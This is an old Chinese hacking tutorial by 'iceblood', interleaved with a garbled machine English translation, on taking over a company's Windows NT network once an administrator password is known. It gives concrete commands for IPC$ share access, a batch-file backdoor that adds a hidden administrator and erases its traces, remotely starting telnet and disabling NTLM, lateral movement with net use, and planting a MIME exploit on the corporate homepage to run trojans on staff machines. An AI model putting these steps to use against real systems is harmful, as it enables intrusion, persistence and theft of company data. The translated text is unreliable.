iceblood
现在的企业当中一般都是使用的NT系统,也不得不承认,NT系统的确是非常适合企业使用的操作系统,然而“黑客”的攻击引来了企业信息安全危机…… Now the enterprises are generally used NT system, have to admit, NT system is indeed very suitable for business use of the operating system, however, "hacker" attacks led to the enterprise information security crisis ...
当有人看了这个标题也许会说:“得到了NT的admin还能做什么,还不是想做什么就做什么呗。”但到底能做什么呢? When people saw the title might say: "get the NT admin can do, not what you want to do the pictures." But in the end do? 能详细答出来的只怕不会很多,而且很多企业系统管理员就认为密码为空没什么,因为他们压根就不知道“黑客”会怎么做。 A detailed out I'm afraid can not be many, and many companies believe that the system administrator password is blank nothing, because they simply do not know "hacker" how would you do. 本文介绍的就是得到NT的Admin密码以后入侵一个企业计算机群的初级和中级手法,尤其是在一个大型企业当中,企业系统管理员的密码往往关系着整个公司的信息泄密,以及公司的数据的丢失,严重的影响到一个企业的发展和生存。 This article is to get the NT Admin password after the invasion of a business group of primary and secondary computer techniques, especially in a large-scale enterprises, firms administrator's password is often related to the company's information disclosure, and the company's data loss serious impact on a business development and survival.
首先,我们先假定得到了某个企业的一台服务器192.168.0.1的administrator的密码,而对方没有关闭139端口。 First, let's assume that an enterprise has been a server 192.168.0.1 the administrator password, and the other did not close the 139 port.
一,普通共享资源的入侵 First, the general invasion of shared resources
这种入侵手法可说是NT最简单的入侵了,随便在自己机器的哪个窗口的地址栏里输入“\\192.168.0.1"大概等1-2秒,对方就会要求你输入用户名和密码,输入所得到的用户名和密码以后就可以进入,并可以看到这台服务器在企业中的共享资源了,由于权限是admin所以你几乎可以删除对方共享资源里的任何东西。 This approach can be said to invade the easiest NT invasion, and just in their own machine which window the address bar enter "\ \ 192.168.0.1" about 1-2 seconds and so on, the other will ask you to enter a user name and password, Enter the user name and password to be able to enter later, and you can see this server in the enterprise's shared resources, because the permission is admin so you can remove almost any other shared resources in things. (如果设置了共享为只读那就没办法了) (If you set shared no other way to read it)
二,默认及隐藏共享资源的入侵 Second, the default and hide the invasion of shared resources
在说这种入侵方法之前我先来给大家介绍一个NT的IPC$连接,在默认情况下NT系统有一个特殊的隐藏共享,就是IPC$共享。 In that way before this invasion to introduce me to a NT-IPC $ connection, by default NT system has a special hidden share is the IPC $ share. IPC$是专门用在NT中的一种管道通讯,NT系统之间的通讯大部分都在IPC$通讯中完成的。 IPC $ is specifically used in the NT, a pipeline communication, NT system, the communication between the IPC $ in the most complete communication.
这次手法相对高明一点,但还是很简单的,不过关键还是要看“黑客”如何利用了,有的人可能只能删删文件,有的人却可以利用这个留下后门,以便下次如果密码改变了后可以利用后门进入。 This means that relatively sophisticated, but still very simple, but the key is to look at "hackers" how to use, and some people may only delete delete files, and some people can use this to leave the back door to the next if After changing the password can use the back door to enter. 同样在机器里随便打开一个窗口,在地址栏输入"\\192.168.0.1"就会要求输入密码,输入以后所看到的东西和前面介绍的一样,好现在同时也建立好IPC$连接了,其实在提示你输入密码时从输入窗口中也知道了是建立IPC$连接。 Also in the machine just open a window in the address bar "\ \ 192.168.0.1" will be asked to enter a password, enter the future and see things the same as described above, good good now but also to establish IPC $ connection, and In fact, you are prompted for the password from the input window is also know to establish IPC $ connection. 然后我们再次在地址栏输入地址,这次输入的就有点不同了,输入“\\192.168.0.1\c$”大概过一会就出现了对方C盘里所有的内容了。 We then enter the address in the address bar again, this time a bit different input, the input "\ \ 192.168.0.1 \ c $" probably after a while it appeared that all of the other C drive contents. 嘿嘿! Hey! 想看对方D盘? Want to see the other side the D drive? 同样,输入“\\192.168.0.1\D$”就看见对方D盘了。 Similarly, the input "\ \ 192.168.0.1 \ D $" on the D drive to see each other. 然后想换这个企业的主页(假如对方还是一个WEB服务器)可说是轻而易举,记住由于权限是管理员当然可以写了,留不留后门就看“黑客”的想法咯,一般他们会在C盘(假设在c:\winnt下)建立一个批处理文件,假设文件名为hack.bat,其内容一般为: Then want to change the corporate home page (if the other party or a WEB server) can be said to be easy to remember because an administrator can of course write permission, and left without leaving the back door to see "hackers" the idea slightly, generally they will in the C disk (assuming c: \ winnt below) to create a batch file, if file name hack.bat, its content is generally:
net user hack 1234 /add * 建立一个用户名为hack的用户密码为1234 * net user hack 1234 / add * to create a user name hack user password is 1234 *
net localgroup administrators hack /add * 让hack也是管理员* net localgroup administrators hack / add * to hack is the administrator *
del C:\Documents and Settings\administrator\「开始」菜单\程序\启动\hack.lnk *删除启动文件夹里的快捷方式消除足迹* del C: \ Documents and Settings \ administrator \ "Start" menu \ programs \ startup \ hack.lnk * delete startup folder shortcut to eliminate footprints *
del c:\winnt\hack.bat * 删除hack.bat这个文件消除足迹* del c: \ winnt \ hack.bat * delete hack.bat this file to eliminate footprints *
这样当企业系统管理员在下次登陆时就会偷偷的添加一个用户了。 So that when the enterprise system administrator in the next landing will secretly add a user. 当然其实添加用户算是一个比较愚蠢的留“后门”的方法了,所以其实很多“黑客”会放一个可以常驻内存的小程序,然后建立一个类似的批处理文件和快捷方式,那么“黑客”基本上可以长期的占有企业中的这台主机了。 In fact, of course, add more users to be stupid to stay a "back door" approach, so in fact, a lot of "hackers" will put a small memory-resident program can then create a similar batch files and shortcuts, then the "hackers" Basically, the possession of long-term business in this host.
三,IPC$连接入侵的高级手段 Three, IPC $ connection means the invasion of senior
然而每个“黑客”都不可能那么笨,非要一直等到下次企业系统管理员登陆以后才可以占有,往往“黑客”会使用更加巧妙的手法,迅速的留下后门。 However, each "hackers" are not stupid, have to wait until the next business systems administrator login before it can hold, often a "hacker" will use more clever tactics, quickly left the back door. 首先他们还是先建立IPC$连接,连接以后他们会使用各种手法开后门,比如打开telnet服务,“黑客”怎么打开telnet服务呢? First, they are still the first to establish IPC $ connection, the connection will use a variety of techniques after they opened the back door, such as opening the telnet service, "hackers" how to open the telnet service? 其实有很多种方法,比如微软公司自己就出了一个小程序(netsvc.exe)就是专门让系统管理员在建立IPC$连接以后远程打开服务用的管理工具,但这个工具到了“黑客”手中自然也成了必不可少的“黑客”工具了,在命令符下输入"netsvc \\192.168.0.1 telnet /start"大概等5分钟对方的telnet服务就打开了,然后"telnet 192.168.0.1"嘿嘿……等! In fact, there are many methods, such as Microsoft himself out of a small program (netsvc.exe) is specifically designed for system administrators to establish IPC $ connection open after the service with the remote management tools, but this tool to the "hacker" in the hands of natural has become essential to "hacker" tool in the Command Prompt type "netsvc \ \ 192.168.0.1 telnet / start" for 5 minutes each about the telnet service is turned on, then "telnet 192.168.0.1" Hey ... ... and so on! 需要NTLM验证,这下又把“黑客”拦在了外面了,这时他们又会用到一个小程序了,就是专门关闭一个NTLM验证的程序ntlm.exe。 Requires NTLM authentication, which again under a "hacker" bar on the outside, and then they will use a small program, that is, a special off NTLM authentication process ntlm.exe. (当然也可以是其他名字)“copy ntlm.exe \\192.168.0.1\admin$\system32”把ntlm.exe复制到对方企业服务器的system32目录下。 (Of course also be other names) "copy ntlm.exe \ \ 192.168.0.1 \ admin $ \ system32" copy to the other side to ntlm.exe system32 directory server. 复制过去了,可怎么让他运行呢? Copy passed, so how can he run? 当然多的是办法了。 Of course, more is the solution. "net time \\192.168.0.1"看看对方系统时间为多少假设为18:00。 "Net time \ \ 192.168.0.1" to see each other as to how the system is assumed to be 18:00. 现在再输入"at \\192.168.0.1 18:02 ntlm.exe",等一会后,命令提示符显示新加任务ID=0,意思是对方系统在18:02时运行ntlm.exe这个程序,等到18:02以后,然后再"telnet 192.168.0.1"嘿嘿~这回是提示需要输入用户和密码了,输入所得到的管理员用户名和密码以后就成功的telnet到了企业服务器了……不过这样一下是netsvc一下又是at实在是麻烦,现在就介绍另一个方法,首先还是先感谢微软为NT系统管理员提供的方便的管理功能,这一功能到了“黑客”手中可说是“黑客”的福音,不用“黑客”再这么麻烦的输入这样那样的命令了。 Now enter "at \ \ 192.168.0.1 18:02 ntlm.exe", later on, the command prompt shows the new added task ID = 0, meaning that the other system to run at 18:02 ntlm.exe this program, wait until after 18:02, and then "telnet 192.168.0.1" Hey - this time is prompted to enter user and password, enter the administrator to get user name and password after you successfully telnet to the enterprise server ... ... but so what is netsvc at what is really troublesome, now introduce another way, above all, first thank Microsoft for NT system administrators to facilitate the management function, which to the "hacker" in the hands can be said to be "hackers" of the Gospel instead of "hackers" and then input to this much trouble as commands. 建立好IPC$连接以后(IPC$连接果然是一种功能非常强大的管理连接),打开本地计算机里的“计算机管理”,用鼠标右键点计算机管理窗口里的“计算机管理(本地)”里面有“连接到另一台计算机”选择它,在“名称”里输入“192.168.0.1”确定以后,首先你的NT系统会看是否建立IPC$连接, “有”就连接上去了,现在你就可以直接管理192.168.0.1了,比如看他的日志,启动他的服务(当然包括telnet了),管理他的IIS,什么都有。 After the establishment of good IPC $ connection (IPC $ connection really is a very powerful management connection), open the local computer in the "Computer Management" by right-clicking Computer Management window of the "Computer Management (Local)" there "Connect to another computer", select it in the "Name", enter "192.168.0.1" is determined, first of all you will see if the NT system to establish IPC $ connection, "yes" to connect up, and now you can direct management of 192.168.0.1, and like to see his log, he started the service (of course including a telnet), the management of his IIS, everything. 多研究一下,连注销对方系统当前登陆的用户,重新启动对方计算机,关闭对方计算机都有,真是强大。 Multi-look, even the cancellation of the other system is currently logged on user, restart the other computer, turn off the computer you are really powerful. NT系统到了“黑客”手中,整个系统都成了一个“黑客”工具了,而且是功能非常强大的“黑客”工具。 NT system to a "hacker" in the hands of the whole system has become a "hacker" tool, and it is very powerful "hacker" tools. 启动了telnet了,可还是要NTLM验证怎么办? Started telnet, and how can or should do NTLM authentication? 简单,在本地计算机建立一个用户名和密码相同的用户,如果已有就把密码改为相同,然后使用这个用户在本地重新登陆,"telnet 192.168.0.1"嘿嘿~连密码都不用输入了,因为通过NTLM验证了啊。 Simple, the local computer to create a user name and password the same user, if you have to put the same password, and then use this user in the local re-visit, "telnet 192.168.0.1" Hey - do not even have entered the password, because, by NTLM authentication, ah.
看了以上文章现在那些安全意识差的企业系统管理员们知道了暴露了管理员密码的危险性了吧? Read the above article are those companies with poor safety awareness system administrators who know the administrator password has exposed the dangers of it? 还没完呢。 Not finished yet. 都到这一步了还没完? Have not finished this one step? 机器都被“黑客”完全控制了呀~是的,还没完,看吧! Machines are "hackers" complete control of the ah - yes, that's not, look!
四,入侵的深入 Fourth, the invasion depth
这一步就需要“黑客”有丰富的经验,实战操作能力要求很高,也不再是文字能描述清楚的了,下面就只能粗略的介绍一下。 This step requires a "hacker" has a wealth of experience in demanding combat operational capability, is no longer able to describe clearly the text, the following can only be a rough introduction.
“黑客”当然不会仅仅在攻馅一台服务器以后就立刻罢手了,他会深入入侵你的内网,尤其是在一个企业中,往往都是计算机群,那些商业间谍“黑客”当然就更加的想入侵到企业内部去了,而很多企业系统管理员喜欢把所有的服务器的密码设为相同,就给“黑客”提供了一个良好的入侵条件,telnet到对方服务器以后,输入"net view"企业中整个一个工作组或域的计算机这时都一展无余。 "Hacker" of course not just filling in the attack immediately after a server give up, he will further invade your internal network, especially in an enterprise, often a computer group, the commercial agent "hackers" of course, the more invasion of want to go to the house, and many companies prefer to all system administrator password is set to the same server, give "hackers" provides a good invasion conditions, telnet to the server after each other, enter "net view" enterprises in a workgroup or domain the computer then have to show it demonstrated. 同样在telnet里建立IPC$连接以后象入侵这台服务器一样的入侵了,前面说的建立IPC$连接都是使用的图形界面,然而这时候已经不再拥有图形界面了,现在假设企业内网的192.168.0.2的密码和这台服务器密码相同,这时可以使用"net use \\192.168.0.2\IPC$ "passwd" /user:username"来建立IPC$连接了,然后是映射驱动盘,输入“net use z: \\192.168.0.2\c$”这样就把192.168.0.2的C盘映射到192.168.0.1的Z盘去了。 Also in the establishment of the IPC $ connection telnet in after the same server as the invasion of this invasion, and in front of that IPC $ connections are established using a graphical interface, but this time no longer has a graphical interface, and now assume that the enterprise network 192.168.0.2 the password and this server password, then you can use "net use \ \ 192.168.0.2 \ IPC $" passwd "/ user: username" to establish IPC $ connection, and then map a drive plate, enter " net use z: \ \ 192.168.0.2 \ c $ "so put the 192.168.0.2 192.168.0.1 C drive mapped to the Z-disk to go. 输入"z:"就可以象浏览192.168.0.1的硬盘一样,浏览192.168.0.2的C盘。 Enter the "z:" As you can browse the hard drive, like 192.168.0.1, 192.168.0.2 browse the C drive. 而如果他是商业间谍“黑客”,一旦发现里面有价值的东西自然不用说将来会发生什么事了。 And if he is a commercial espionage "hackers", once found it valuable in the future things will happen naturally without saying what happened. 当然这往往还算是最好的条件,其实还是有相当一部分企业系统管理员不会把密码设为一样的。 Of course, this is often still the best conditions, but it is still a considerable portion of the system administrator will not set the same password. 现在就看网络的情况了,如果入侵的正好是一台主域控制器,嘿嘿,那对于商业间谍来说可是高兴死了,赶快把自己升级成域管理员,这下整个企业的一个域的机器都落在了他的手中。 It is up to the network situation, and if the invasion is just a primary domain controller, hey, that is for espionage, but happy dead, rush to upgrade their domain administrators, this entire enterprise under a domain machines fall on his hands. 当然在“黑客”手中这也算是一种非常好的情况,但现在微软行行色色的漏洞越来越多,同时也根据“黑客”的经验的多少,决定着入侵内网的机会的大小。 Of course, the "hacker" in the hands it would be a very good, but now Microsoft trekking more and more color-color flaws, but also under the "hacker" in the amount of experience, determines the invasion of the size of the opportunity within the network. 在一个企业中,往往直接连接Internet的是WEB服务器,而一个有耐性的“黑客”,一个想入侵这个企业的商业间谍当然会不惜一切手段入侵,其中一个手法就是利用WEB服务,微软公司在今年出现的MIME漏洞就有很好的利用价值,这里顺便介绍一下MIME漏洞,MIME在处理不正常的MIME类型中存在问题,攻击者可以建立一个包含可执行文件的附件的HTML,EMAIL并修改MIME头,使IE不正确处理这个MIME,而执行所指定的可执行文件附件。 In an enterprise, often directly connected to the Internet is a WEB server, and a patient of the "hacker", a wish to invade the corporate espionage invasion of all means of course, one approach is the use of WEB services, Microsoft this year MIME flaw appeared there good value in use, tell us about the way here MIME vulnerability, MIME handling unusual problem in the MIME type, an attacker can create a file containing an executable attachment HTML, EMAIL and modify MIME headers , so that IE does not properly handle this MIME, and perform the specified executable file attachments. 有关详细情况请大家参阅badboy的《利用错误的MIME头实行攻击》在我们的站点可以找到。 For details please refer to the badboy of the "implementation of the use of Incorrect MIME header attack" can be found on our site. 有了这个漏洞,“黑客”将会更换WEB服务器的主页,在主页里把MEMI漏洞攻击代码插进HTML中,使得企业内部的员工在浏览自己公司主页时运行指定的程序。 With this loophole, "hackers" will replace the WEB server home page, on the home page in the MEMI exploit code inserted into the HTML, making in-house employees view their company in the home run the specified program. (企业内部绝对不可能从来不看自己的主页的,尤其是企业负责人,他们一般都会不定期的检查主页。)那么他们在浏览自己的主页时就无声无熄的执行了“黑客”所指定的程序,这个程序可能是木马,也可能同样是添加用户的批处理文件。 (Within the enterprise is absolutely impossible to never see their home, especially the people in charge, they usually check the home page from time to time.) Then they visit their home page, put out on the silent non-implementation of the "hacker" as specified program, this program may be Trojan, the user may also add a batch file.
由上面可以看出一旦NT系统的密码泄露是一件多么危险的事情,尤其在一个企业当中,同时一个企业网络的拓扑是否合理也起着非常重要的作用,并且“黑客”尤其是商业间谍,所利用的手法远远不只有这些,他们还可以利用其他方式。 As can be seen from the above password leakage once the NT system, how is a dangerous thing, especially in a business which, while a reasonable enterprise network topology also plays a very important role, and "hacker" especially commercial espionage, approach used by far not only that, they can also use other ways. 比如安装sniff(嗅探器)监视整个企业的数据传送情况以及内容等,都严重的泄露了企业的信息。 Such as installing sniff (sniffer) to monitor the situation throughout the enterprise data transmission and content, have a serious leak of information enterprise. 其他还有通过电子邮件传送木马,或MIME攻击语法等各种途径来得到企业内部的敏感信息或保密信息。 There are other Trojans via e-mail, or MIME syntax attack various means to get in-house sensitive or confidential information.
五,其他入侵 Fifth, other invasive
这里所说的并不是说不重要,而是补充一下上面没有说到的东西以及一些也是非常简单的手法。 Talking about here is not to say important, but to add something not mentioned above and some are also very simple way. 其他还可以通过3389端口入侵,3389是Win2000系统的自带的,并且是图形界面的,远程管理里服务的端口,“黑客”一旦有了管理员密码,危险性也更加直观化。 Other ports can also be invaded by 3389, 3389 is the Win2000 system comes with, and is the graphical interface, remote management in the service of the port, "hackers" Once the administrator password, the risk of more intuitive. 另外就是通过IIS的管理入侵,在默认情况下IIS提供一个WEB方式的管理服务,在c:\inetpub\wwwroot里有一个叫 iisstar.asp的东西,如果可以访问,而且有管理员密码(NT4里不是管理员也可以,只要是NT的合法帐号)就可以远程通过WEB方式管理IIS 信息服务,然后通过特殊手法进一步控制整个机器,然后是整个企业…… The other is the management of the invasion by IIS, by default, IIS provides a WEB-management services, in the c: \ inetpub \ wwwroot where there is a thing called iisstar.asp, if you can access, but also the administrator password (NT4 in not the administrator, as long as the legal account for NT) you can remotely manage IIS through the WEB service, and to further control the entire way through a special machine, then the entire enterprise ... ...
声明:此文带有一定的攻击性,不得利用此文的内容对任何网络做入侵实验,以及违法行为,否则后果自负。 Disclaimer: this article with a certain aggressive, not to use the contents of the article to do any network intrusion experiment, as well as illegal, or peril. 文章由iceblood本人原创,版权归本人所有,未经允许不得转载。 Post by iceblood my original, I am all copyright, shall not be reproduced without permission. 作者E-Mail:iceblood@yeah.net如要转载请先和作者联系。 Author E-Mail: iceblood@yeah.net as to reproduction please contact the author.
Tidak ada komentar:
Posting Komentar